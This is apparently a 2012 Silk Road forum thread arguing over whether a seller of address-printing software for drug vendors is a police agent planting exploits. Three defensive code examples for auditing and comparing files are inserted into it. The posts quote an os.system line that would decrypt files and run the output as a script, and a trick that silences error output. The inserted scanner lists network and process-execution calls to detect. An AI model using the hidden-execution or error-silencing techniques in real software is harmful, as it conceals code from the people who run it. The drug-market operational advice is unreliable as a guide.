The fact is that while people should think for themselves, they frequently don't.  As much as you might wish it were otherwise, you have used your standing in these forums to make uncorroborated mud stick to me and you know damn well that's the case.

You think I give a flying fuck about how affronted you are when there was a fantastic opportunity vendors using your software would have got busted if this had not been made public.

No, I think you're taking advantage to make sure your suspicions are accepted as fact.  That's all.

Even if you don't think it's a case of 70:30 ratio of Louis being a LE agent, most people in this thread think the opportunity cost of being wrong is too high even if the ratio was 10:90.

Perhaps, I guess we'll see.

For the record on my part, I think this has been a healthy albeit awkward discussion that has made the dangers of software exploits abundantly clear.

It has certainly been interesting.

If this was a LE project, it has failed miserably.

Once again, it isn't.  I'm sure the real LE reading the forums must be having a good laugh at it though.

If Louis feels offended, well, that's just too bad. If he's around after the drug war and it is shown I was wrong, then I'll be delighted to compensate him.

It's easy to make promises you'll never have to make good on.
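
Added example, not part of any post in this thread and not the vendor's tooling: the "counting" check argued over above, in which several recipients each hash what they received and compare results. Each delivery is described as encrypted to its buyer, so the ciphertext (and even the gzip wrapper) can differ between identical copies; this sketch therefore hashes the unpacked files. The archive contents, paths and buyer names are constructed.

```python
import hashlib
import io
import tarfile
from collections import defaultdict


def manifest(archive_bytes):
    """Map each regular file in a gzipped tarball to the SHA-256 of its content."""
    result = {}
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:gz") as tar:
        for member in tar.getmembers():
            if member.isfile():
                data = tar.extractfile(member).read()
                result[member.name] = hashlib.sha256(data).hexdigest()
    return result


def compare(manifests):
    """manifests: {recipient: {path: digest}}.

    Return {path: {digest_or_MISSING: [recipients]}} for every path on which
    the recipients do not all agree. An empty dict means every copy matched.
    """
    all_paths = set()
    for files in manifests.values():
        all_paths.update(files)
    by_path = defaultdict(lambda: defaultdict(list))
    for recipient, files in sorted(manifests.items()):
        for path in all_paths:
            by_path[path][files.get(path, "MISSING")].append(recipient)
    return {p: dict(groups) for p, groups in by_path.items() if len(groups) > 1}


def make_archive(files):
    """Build a constructed .tar.gz in memory from {path: bytes} (sample data only)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, data in sorted(files.items()):
            info = tarfile.TarInfo(path)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def demo():
    """Three constructed deliveries; buyer_c's copy has one altered file."""
    honest = {"pkg/README": b"usage notes\n",
              "pkg/text2html.py": b"txtlist = 'text-files.list'\n"}
    altered = dict(honest)
    altered["pkg/text2html.py"] += b"import socket\n"
    received = {"buyer_a": make_archive(honest),
                "buyer_b": make_archive(honest),
                "buyer_c": make_archive(altered)}
    return compare({who: manifest(blob) for who, blob in received.items()})


if __name__ == "__main__":
    for path, groups in demo().items():
        print(path)
        for digest, recipients in groups.items():
            print("  ", digest[:16], recipients)
```

Agreement among recipients shows only that they received the same files, not that those files are safe.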
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: sl1pknot on September 14, 2012, 10:16 pm
/nerds
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 14, 2012, 10:17 pm
Quote
By the end of next year Ruby will be 18 years old, nearly old enough to drink (in most places) and it still doesn't have that.  Wow.

Ruby does bytecode but in most implementations of it there is not an (easy, or intended) way to launch programs directly from bytecode. Also I think Ruby is 20 years old not 18.

I was going on the first release date on Wikipedia, not design documents or anything else.

As far as how many people here know C and can audit it, I assume quite a few actually. I have had no problems finding a whole lot of people to look over any of the code I have ever written. We are on a forum on the darknet where everyone uses crypto, there are probably hundreds to a thousand professional and hobbyist programmers on this forum.

That would be good, hopefully some of them are Python coders and will speak up.  Maybe even enough to look at one of the Python files I posted from version 1.1.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 14, 2012, 10:20 pm
Quote
Every time a vendor has to make a reply to a customer, they have to burn data to 2 read only DVD/CDs. Once to find out what the message was, once to make the reply.

Actually at least in one direction they would need to hand type the information over. Using DVDs in both directions would break the air gap.

As America discovered with SIPRNET.  It was RW DVDs that (allegedly) bridged that air gap.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 14, 2012, 10:28 pm
it seems to me that you could just do this instead

os.system("gpg --decrypt-files *.asc | some_(obfuscated?)_way_to_run_the_output_as_a_script")

Nope, because your later comment:

actually I don't think it will work with --decrypt-files because the output is handled differently, I think it would indeed take more code to do it with that flag being used instead of -d.

Is correct.

You'd either have to enter your passphrase for every encrypted file (which defeats the purpose) or use gpg-agent to cache the passphrase.  Since gpg-agent and pin-entry only work in GPG 2 and above, I chose not to rely on it.  Most Linux and BSD systems ship with GPG 1.4.x by default.

although I am not sure if python comes with something like ruby's irb that would allow you to pipe a script to it to be immediately launched.

Calling Python on the command line will do it.  In fact many Python files are run by typing:

Code:
python filename.py
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: BeansUSA on September 14, 2012, 10:51 pm
Don't buy software from people on SR, end of
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 14, 2012, 10:54 pm
You're making the assumption that data needs to be transferred bidirectionally across the air gap.  The purpose of this software is to parse data in the SR order table and produce printed labels or envelopes.  Once the data is transferred from the system accessing Tor and SR to one with no connectivity except to a printer, there is no requirement to transfer any data back at all.

Once the printing, packaging and posting is done the vendor just logs back into SR and updates the order status as normal.

Splendid idea in terms of security, separating PGP public keys from PGP private keys on two different machines. But I've yet to hear from these hordes of Air Gap using vendors. They are a figment of your imagination so far as I can see.

Because you know, I thought this software was to aid the business of decrypting addresses, not upgrading the vendor's operation security to be using Air Gaps.

It is.  The sole purpose of the software is to take data, decrypt as necessary and rewrite the data for printing.

I'm pretty sure this only occurred to you inside this thread, you admit the use of Air Gaps was not part of the original plan, right? It's not in your advertisement anywhere. This was an afterthought. Is that something you're able to admit? If you're not going to update your advertisement it's just this thought experiment you had this one time.

The original concept, which has not changed, is to provide a streamlined method of getting data from SR to a printer.  The code does not make any network connections whether a network is available or not.  I don't really care personally whether someone employs an air gap or not, that's up to them.

The air gap idea only entered the discussion when you and Kmf started trying to demonstrate how an exploit could work if there was not an air gap in place.  Which is when I pointed out that if networked code was included an error would be generated if a network was not available.  I then pointed out that if an air gap was used and no error message was triggered then it would go some way to proving that it didn't try to open a socket anywhere.

Now that only goes some way towards the proof, because it is possible to write code to redirect all the output to the bit bucket.  Here's an example from stackoverflow.com of how to do that:

Code:
import sys

class DevNull:
    def write(self, msg):
        pass

sys.stderr = DevNull()

The easy way to spot that, though, without even reading the code is to run any of the code with files missing (e.g. the CSV files).  If the Python traceback messages appear complaining about the files being missing then stderr is not being rewritten.

Since I used traceback errors during development with the original vendor, that's a good indication that I didn't use the above or anything like it.  Still, I don't expect you to believe that, I'm just mentioning it because it happened.

Since using Air Gaps is so simple, your customers should have no trouble going over this new paradigm according to you. Amongst other things, I contest that, it's rather exotic thing you're expecting us to believe.

I don't really care whether they do or they don't.  I've only used an air gap as an example of a system configuration with no network access when attempting to explain that the code does not need network access and contains no exploit which would need one.

That said, encouraging vendors to use an air gap is worthwhile.

I cannot comprehend how your customers are expected to adopt tippy top best practices, when the real security vulnerabilities lie with trusting yourself. Your No.1 goal should be removing the necessity of trusting LouisCyphre and replacing it with cryptographic forms of trust from the outset.

Well, customers will receive a gzipped tarball or zip file that is encrypted to them, encrypted to me and signed by me so that they can be sure that what I send them really does come from me.  Checksums won't help as much as you think, except to help me prove that any code that someone obtains from me and posts here really is what I am selling.

As for trusting me, or not, I never claimed that they should.  Which is why I wrote the code in a way that enables it to be run on an unconnected system.  Physical trust beats cryptographic trust every time.
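
Added example, not part of any post in this thread and not SROPPy code: the audit questions raised in the posts above (which modules are imported, where files are opened, whether decrypted text is handed to an interpreter, whether sys.stderr is rebound) can be listed mechanically with Python's ast module before a script is read by hand. The two sample scripts are constructed from the patterns quoted in the thread; the category names and module lists are this example's assumptions, and it assumes Python 3.8+ and source that Python 3 can parse.

```python
import ast

# Names a reviewer should account for; these lists are assumptions, not exhaustive.
NETWORK_MODULES = {"socket", "ssl", "urllib", "urllib2", "httplib", "http",
                   "ftplib", "smtplib"}
EXEC_MODULES = {"os", "subprocess", "commands", "pty", "ctypes"}
EXEC_CALLS = {"system", "popen", "Popen", "call", "check_output", "run", "execv"}
DYNAMIC_BUILTINS = {"eval", "exec", "compile", "__import__", "getattr"}
HIGH_RISK = {"network-import", "process-exec", "dynamic-code", "stream-redirect"}


def dotted(node):
    """Render a Name/Attribute chain (e.g. os.system) as dotted text."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    parts.append(node.id if isinstance(node, ast.Name) else "?")
    return ".".join(reversed(parts))


class IOAudit(ast.NodeVisitor):
    """Collect (line, category, detail) findings for one script."""

    def __init__(self):
        self.findings = []

    def _add(self, node, category, detail):
        self.findings.append((node.lineno, category, detail))

    def _import(self, node, module):
        root = module.split(".")[0]
        kind = ("network-import" if root in NETWORK_MODULES else
                "exec-import" if root in EXEC_MODULES else "import")
        self._add(node, kind, module)

    def visit_Import(self, node):
        for alias in node.names:
            self._import(node, alias.name)

    def visit_ImportFrom(self, node):
        self._import(node, node.module or ".")

    def visit_Call(self, node):
        func = node.func
        if isinstance(func, ast.Name) and func.id in DYNAMIC_BUILTINS:
            self._add(node, "dynamic-code", func.id)
        elif isinstance(func, ast.Name) and func.id == "open":
            mode = "'r'"  # default when no positional mode is given
            if len(node.args) > 1:
                arg = node.args[1]
                mode = repr(arg.value) if isinstance(arg, ast.Constant) else "<dynamic>"
            self._add(node, "file-io", "open mode=" + mode)
        elif isinstance(func, ast.Attribute) and func.attr in EXEC_CALLS:
            self._add(node, "process-exec", dotted(func))
        self.generic_visit(node)

    def visit_Assign(self, node):
        # Rebinding sys.stderr/sys.stdout would hide tracebacks from the user.
        for target in node.targets:
            if dotted(target) in ("sys.stdout", "sys.stderr"):
                self._add(node, "stream-redirect", dotted(target))
        self.generic_visit(node)


def audit(source):
    """Return the sorted findings for one script's source text."""
    visitor = IOAudit()
    visitor.visit(ast.parse(source))
    return sorted(visitor.findings)


def high_risk(findings):
    """Keep only the findings that need an explanation before running."""
    return [f for f in findings if f[1] in HIGH_RISK]


# Constructed samples: the first mirrors the file handling in text2html.py,
# the second combines the os.system and DevNull patterns quoted in the thread.
CLEAN_SAMPLE = '''\
lfile = open("text-files.list", "rb")
for name in lfile.readlines():
    nfile = open(name.rstrip() + ".html", "a")
    nfile.write("<html><body></body></html>")
    nfile.close()
'''
SUSPECT_SAMPLE = '''\
import os, sys
class DevNull:
    def write(self, msg): pass
sys.stderr = DevNull()
for name in os.listdir("."):
    os.system("python " + name)
'''

if __name__ == "__main__":
    for label, src in (("clean", CLEAN_SAMPLE), ("suspect", SUSPECT_SAMPLE)):
        print(label, audit(src), "high-risk:", high_risk(audit(src)))
```

A report with no high-risk findings narrows where to read; it does not replace reading the script or running it on an isolated machine with input files missing to confirm that tracebacks still appear.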
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: THUMBSuP. on September 20, 2012, 03:38 am
sorry... late night roxi30 RANT.
super duper high priest. level85.
All I can say is I'm glad you're here.

/thumbs

thanks []D [] []V[] []D.
and ,i, am glad you're here.


/thumbs
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: Limetless on September 20, 2012, 03:40 am
Don't buy software from people on SR, end of

+1
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: tylerdurdan on September 20, 2012, 02:41 pm
First, I just wanna say HELLO Louis  :)
Second, I want to put a disclaimer on this post: I only just started posting on the SR forums so I realize I don't have any credibility at all. And I am also not saying this is the only possibility, but it could be one of them. I also know very little about coding, I haven't looked into it at all--which is changing now. Yes this is all conjecture, but I enjoy thinking about this kinda stuff.

Despite those handicaps, if you would indulge me, I just have a couple thoughts on this (after having read the whole damn thread just to make sure no one else had addressed these ideas. Although I guess the chances of that were pretty slim lol).

I already know this is gonna be long and might sound crazy..but hey if you can't go crazy sometimes you'll probably go insane  ;D

What if instead of going for a straightforward attack on vendors one at a time like might be expected, this is actually the second or third phase of a very elaborate operation. An operation whose sole end goal is to shut down SR in one fell swoop, including the big buyers (maybe the small ones too), vendors, and all the way up to the big cheese, Dread Pirate Roberts himself  :o

This whole operation would take at least a year probably.
1. The first phase may have been to insert a large number of LEO in SR and the forums to get a lay of the land, so to speak--compile profiles of big players and gain as much information as possible.

2. The second phase (or first if you don't count the other LEOs as part of this plan) was to introduce an individual/small group, adept at software coding, and have him/her/them infiltrate the social environment of SR and gain people's trust by helping some people with minor issues and rubbing shoulders with some of the more influential members.

3. The third phase is to introduce a new precedent to SR--selling software to vendors. This would be accomplished by selling legit software at first, no malicious scripts. Just to get their foot in the door. Then as time goes on people become more accustomed to the idea, and the software gets more and more complex, with less and less scrutiny as the software continued to be useful. Maybe with an extra script here and there, that may not be activated until the final piece is added.

4. The fourth phase is to shut the door to the trap all our vendors willingly walked into by downloading anonymous software, and shut down SR if they get DPR. If he gets away then they will have arrested almost all the sellers and then it's virtually shut down, at least for a while. And LE gets to say they made "the largest nationwide bust on a criminal conspiracy organization that was making use of advanced encryption and an almost untraceable and completely virtual currency."

I personally wouldn't put it past LEA to do any of this, especially since how else are they going to shut down the Silk Road? (Other than make BTC illegal or regulated to death.) Not to mention the extent these people will go to when it comes to engineering some impressively elegant malware and how much time these people will put into a case. This is a link to a Wired article about Stuxnet. It seems to be on par with the idea that LE would be patient when it comes to shutting down something like SR and proof that there are extremely advanced viruses out there that are funded by governments.
http://www.wired.com/threatlevel/2011/07/how-digital-detectives-deciphered-stuxnet/all/

Louis could be that individual, of course I cannot know with complete certainty. However, there are just so many red flags about this guy and his posts that make me extremely wary and should make everyone on here think twice about buying his software.

I don't think pine calling him out was part of the plan, but he could turn this whole exchange into a pig plus for LE and the very operation they had already planned. With pine and kmf haranguing him about the possibility of malicious code in this particular piece of software:

http://silkroadvb5piz3r.onion/index.php/silkroad/item/db203c965e

when it finally is discovered that it doesn't in fact have any in it then they look foolish and prejudiced for jumping down his throat about trying to sell unaudited anonymous software to all the SR vendors (yes that was the first flag like pine pointed out quite aptly). While louis basically gets the protection of double jeopardy after having been falsely accused. This obviously wouldn't provide any real immunity if he was discovered to be shoveling malware onto the road, but it might reduce the chances of him being discovered, simply because no one wants to look like an idiot--although I know that will never deter pine ;) which I'm totally behind. Vigilance is the cost of liberty.

But back to the first flag, it could have been naivety until he consistently rejected requests to have it posted on the forums so it could be audited (second flag). It seems like he doesn't want to seem eager about getting this out to vendors, but I'm guessing the plan was to just wait long enough to not draw suspicion, but eventually just has to get it to vendors, cause that is his objective. The reason he gave for not wanting to give away the coding was that he wanted to get paid for his work. Which is completely fair. Except there is a huge risk involved in just taking his word for the safety of this software. I mean worst case scenario (if it turns out to be possible) is the complete eradication of the last vestiges of true freedom left in this country. I agree with many of you in the idea of not sacrificing the principles this entire movement(?) is based on for a little security.

However, I also am not about to lose this fucking site and this one serious chance I've seen to change the future. There has to be a level of pragmatism here and it comes in the form of skepticism and caution. If louis wants to keep trying to sell his software I frankly don't care, but don't expect people to just accept this kind of risk. I doubt he will have any takers, especially after people had the opportunity to read up on all the dangers of exploits in scripts.

Third flag is his logic on selling the software rather than make it available to everyone and accepting donations. No one is going to buy it as it stands now no matter how many times he insists nothing will go wrong and he'll guide you through every step of the way. It costs too much, it's an enormous risk, and not just for individual vendors. If he posted it for donations then he could get direct, instant feedback before he started selling it to people, btc, and the opportunity to offer more software to SR, just as long as everyone knows what they're getting. And with that repeat business/donations he would make more than just sitting around waiting for someone to buy the way overpriced one.

Fourth through Ninth flags are just his posts (not really in any particular order)
text2html.py:
Code: [Select]
#! /usr/bin/env python

# Copyright (C) Louis Cyphre, 2012
# lcyphre@tormail.org

# Converts address text files to HTML

txtlist = "text-files.list"

lfile = open(txtlist, "rb")
ldata = lfile.readlines()
lfile.close()

for string in ldata:
    tfile = open(string.rstrip(), "rb")
    tdata = tfile.readlines()
    tfile.close()
    nfile = open(string.rstrip()+".html", "a")
    nfile.write("<html><body>")
    for string in tdata:
        nfile.write(string)
        nfile.write("<br />")
    nfile.write("</body></html>")
    nfile.close()


Now let's see if an exploit is buried in there.  By the way, if that doesn't add up to 545 bytes then it just means there were more blank lines at the end, so add carriage returns (in Vim or Emacs) until it does and then check the SHA sum.

Easily proven wrong with SHA256 checksums.  Actually, there's a point, better go and add that for the individual files.

Checksums were considered originally, but as I've stated they only help me to prevent a future possibility of being framed.

These three quotes before show him contradicting himself. I don't know if this implies anything sinister by itself though, although it does seem odd to me that he wouldn't know how to check if his own software had been modified..I guess he could have been reading it line by line..

Yeah, that's fair enough.  Don't worry, though, if someone does try that kind of inverted controlled delivery there's nothing that could result in anti-LE retaliation.

That's just downright creepy. "Don't worry, if the feds want your ass, they can take it and there ain't a damn thing you can do about it." To me that SCREAMS LEO.

Paranoia is just seeing a threat where it doesn't exist, so in this case that's exactly what you are.

Paranoia is recognizing dangers even if other people can't see them, paranoia is everyday reading about feds and cops that will set you up in a heartbeat for anything (especially if you are a smart ass to them), paranoia keeps you alive and free. So long as you don't let it overcome you. There is always a balance to be struck in the natural world, some kind of equilibrium of variables that provides the minimum resistance for whichever process to take place in.

Alright, I'm really tired, I haven't slept in about 36 hours. I hope I didn't leave anything out..so sorry about the length.

tldr: Project Mayhem has begun.  :-X lol
not really

Well I hope this is all wrong, but it might not be.

Oh and here is a little fun fact for anyone who's interested:
An anagram for LouisCyphre is: Cop irl? Uh, yes!  :o
                         cop irl uh yes
Doesn't mean anything probably, just interesting..
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: Limetless on September 21, 2012, 06:59 am
So did any real conclusion come of all this?
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: catfishinmysocks on September 21, 2012, 07:34 am
So did any real conclusion come of all this?

From what I gather there's a huge market for tin foil on here. I'm going to get a vendor account and nip to Tesco.

You shouldn't buy software on here as a general rule (all that needs saying), but all the attacks on this developer are bullshit. Just read the post above yours. Nuts.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: tylerdurdan on September 21, 2012, 07:54 am
Hope so
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: pine on September 21, 2012, 06:54 pm
So did any real conclusion come of all this?

From what I gather there's a huge market for tin foil on here. I'm going to get a vendor account and nip to Tesco.

You shouldn't buy software on here as a general rule (all that needs saying), but all the attacks on this developer are bullshit. Just read the post above yours. Nuts.

There is nothing crazy about what Tyler is saying. If you read the intelligence documents we've been receiving, you'd not be so laissez-faire. Not one little bit.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: Limetless on September 21, 2012, 08:56 pm
Surely the simple answer to this is not to buy/accept any software from SR. It just seems like a case of common sense. I know absolutely fuck all about I.T so I can't comment on whatever was sent but it just seems like this can be averted by not going anywhere near the situation in the first place.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: pine on September 21, 2012, 10:10 pm
Surely the simple answer to this is not to buy/accept any software from SR. It just seems like a case of common sense. I know absolutely fuck all about I.T so I can't comment on whatever was sent but it just seems like this can be averted by not going anywhere near the situation in the first place.

Yes, exactly.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: Limetless on September 21, 2012, 10:22 pm
So all this is moot then because only a retard would do it in the first place and given that the splitting of people into retards and non-retards is really just another of nature's many forms of natural selection then really, who gives a flying fuck? The idiots who fall into the retard category get caught or burned as they do in all walks of life and the people who aren't retards carry on as usual. Simple. Who cares if LouisCyphre is LE or he just acted a bit silly and made himself look bad, if he is the former then he'll only smoke the chaff anyway.

SR may be a leveler but it's also about survival of the shittest as well, people seem to forget this.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: uniwiz on September 21, 2012, 11:45 pm
So all this is moot then because only a retard would do it in the first place and given that the splitting of people into retards and non-retards is really just another of nature's many forms of natural selection then really, who gives a flying fuck? The idiots who fall into the retard category get caught or burned as they do in all walks of life and the people who aren't retards carry on as usual. Simple. Who cares if LouisCyphre is LE or he just acted a bit silly and made himself look bad, if he is the former then he'll only smoke the chaff anyway.

SR may be a leveler but it's also about survival of the shittest as well, people seem to forget this.

Interesting view on things. The simple solution is always the best.
Or use your head ;D
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: Limetless on September 22, 2012, 12:16 am
Well it's just annoying that this thread went on for so long for fuck all reason.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: THUMBSuP. on September 22, 2012, 10:00 am
pewpew.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 22, 2012, 04:57 pm
First, I just wanna say HELLO Louis  :)
Second, I want to put a disclaimer on this post: I only just started posting on the SR forums so I realize I don't have any credibility at all. And I am also not saying this is the only possibility, but it could be one of them. I also know very little about coding, I haven't looked into it at all--which is changing now. Yes this is all conjecture, but I enjoy thinking about this kinda stuff.

You definitely needed that caveat, but I enjoy a good conspiracy theory.  In this case, I guess one of two ain't bad.

What if instead of going for a straightforward attack on vendors one at a time like might be expected, this is actually the second or third phase of a very elaborate operation. An operation whose sole end goal is to shut down SR in one fell swoop, including the big buyers (maybe the small ones too), vendors, and all the way up to the big cheese, Dread Pirate Roberts himself  :o

How?  The only ways to get to DPR would be to trace the bitcoins or locate the clearnet IP of the hidden service(s).  Infiltrating the forums or selling code to vendors won't do that.

BTW, I offered a copy of the code to DPR if he wanted to vet it.  That offer was declined.

Louis could be that individual, of course I cannot know with complete certainty.

No, you don't.

However, there are just so many red flags about this guy and his posts that make me extremely wary and should make everyone on here think twice about buying his software.

Well, no one's being forced to do anything and I'm sure they'll be as wary as they need to be based on their own threat assessment.

Fourth through Ninth flags are just his posts (not really in any particular order)

Now let's see if an exploit is buried in there.  By the way, if that doesn't add up to 545 bytes then it just means there were more blank lines at the end, so add carriage returns (in Vim or Emacs) until it does and then check the SHA sum.

Easily proven wrong with SHA256 checksums.  Actually, there's a point, better go and add that for the individual files.

Checksums were considered originally, but as I've stated they only help me to prevent a future possibility of being framed.

These three quotes before show him contradicting himself. I don't know if this implies anything sinister by itself though, although it does seem odd to me that he wouldn't know how to check if his own software had been modified..I guess he could have been reading it line by line..

Not really.

The code snippet is one of the largest files from version 1.1 of the code.  It was posted to demonstrate how lean the code is and how the discussion of planting an exploit in it without notice would be incredibly difficult.  Read it in the context of the discussion with Kmf.

The SHA checksums were not originally included because there's only one source of the code (me).  Checksums are used to verify that a copy obtained elsewhere actually matches the original source, so that people can safely download from mirror servers.

Since I intended the only source to be myself and each distributed copy would be encrypted and GPG signed by me, I didn't feel the need to include it from the beginning.  Once this thread was created I realised the possibility of someone purchasing the software, modifying it to include an exploit and then posting their exploited version.  The checksums help me to prove if someone attempts this.

In short, checksums with this distribution model are more for my benefit than end users.

Yeah, that's fair enough.  Don't worry, though, if someone does try that kind of inverted controlled delivery there's nothing that could result in anti-LE retaliation.

That's just downright creepy. "Don't worry, if the feds want your ass, they can take it and there ain't a damn thing you can do about it." To me that SCREAMS LEO.

That is not what I said.  What I said was that purchasing the software and running it in a secure environment and/or auditing the code (the inverted controlled delivery that Pine proposed with regards to the software), could not produce any kind of tracking.  Hence there was nothing that would lead to LE involvement and as a result of *that* there could be no anti-LE retaliation.

Oh and here is a little fun fact for anyone who's interested:
An anagram for LouisCyphre is: Cop irl? Uh, yes!  :o
                         cop irl uh yes
Doesn't mean anything probably, just interesting..

This is my favourite part of the whole post.  Pure gold!  No, I didn't notice the anagram when I selected the handle.  There are actually three reasons for using this name and, in reverse order, they are:

1) The "surname" Cyphre being an alternate spelling of cipher.
2) A certain pharmaceutical with nickname for the first part of the handle.
and 3) How to put this, say the pseudonym out loud.  It helps if you shorten "Louis" to "Lou" when you do that.  What does that sound like?

I've actually referred to that in one of the guides I posted in the security forum.  I think it was the key generation one, but I can't be bothered double-checking.
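The byte count, trailing blank lines and SHA checksum discussed in the post above interact in a way that is easy to show in code. The following is an added example, not part of the original thread and not the vendor's code: it classifies a copy of a file against a published size and SHA-256, separating newline-only differences introduced by copy and paste from real content changes. The sample file is a constructed stand-in, not the real text2html.py, and the function names are assumptions made for the illustration.

```python
import hashlib


def sha256_hex(data):
    """Hex SHA-256 digest of a byte string."""
    return hashlib.sha256(data).hexdigest()


def check_copy(data, published_size, published_sha256):
    """Classify a copy as 'exact', 'newline-differences-only' or 'modified'."""
    if len(data) == published_size and sha256_hex(data) == published_sha256:
        return "exact"
    # Copy and paste through a forum can change line endings and drop or add
    # blank lines at the end; undo only that, then pad to the published size.
    body = data.replace(b"\r\n", b"\n").rstrip(b"\n")
    pad = published_size - len(body)
    if pad >= 0 and sha256_hex(body + b"\n" * pad) == published_sha256:
        return "newline-differences-only"
    return "modified"


# Constructed stand-in for a published file (not the real text2html.py).
ORIGINAL = (b'nfile.write("<html><body>")\n'
            b'nfile.write("<br />")\n'
            b'nfile.close()\n\n\n')
PUBLISHED_SIZE = len(ORIGINAL)            # stands in for the "545 bytes" figure
PUBLISHED_SHA256 = sha256_hex(ORIGINAL)   # stands in for the posted SHA sum

PASTED = ORIGINAL.rstrip(b"\n") + b"\n"            # lost two blank lines
WINDOWS_PASTE = ORIGINAL.replace(b"\n", b"\r\n")   # CRLF line endings
TAMPERED = ORIGINAL.replace(b"<br />", b"<hr />")  # same size, different bytes

if __name__ == "__main__":
    for name in ("ORIGINAL", "PASTED", "WINDOWS_PASTE", "TAMPERED"):
        print(name, check_copy(globals()[name], PUBLISHED_SIZE, PUBLISHED_SHA256))
```

A matching digest shows only that a copy equals what the publisher hashed; it says nothing about what that code does.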
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 22, 2012, 04:58 pm
So did any real conclusion come of all this?

Not that I've seen, but expect it to drag on indefinitely.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: Limetless on September 22, 2012, 05:01 pm
Lol Louis you need to hush mate, you aren't doing yourself any favours.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: THUMBSuP. on September 23, 2012, 03:54 am
LUCIFER!!!!



666

666

666

666

666

666

666

666

all Christians need to run bitches!!!



/thumbs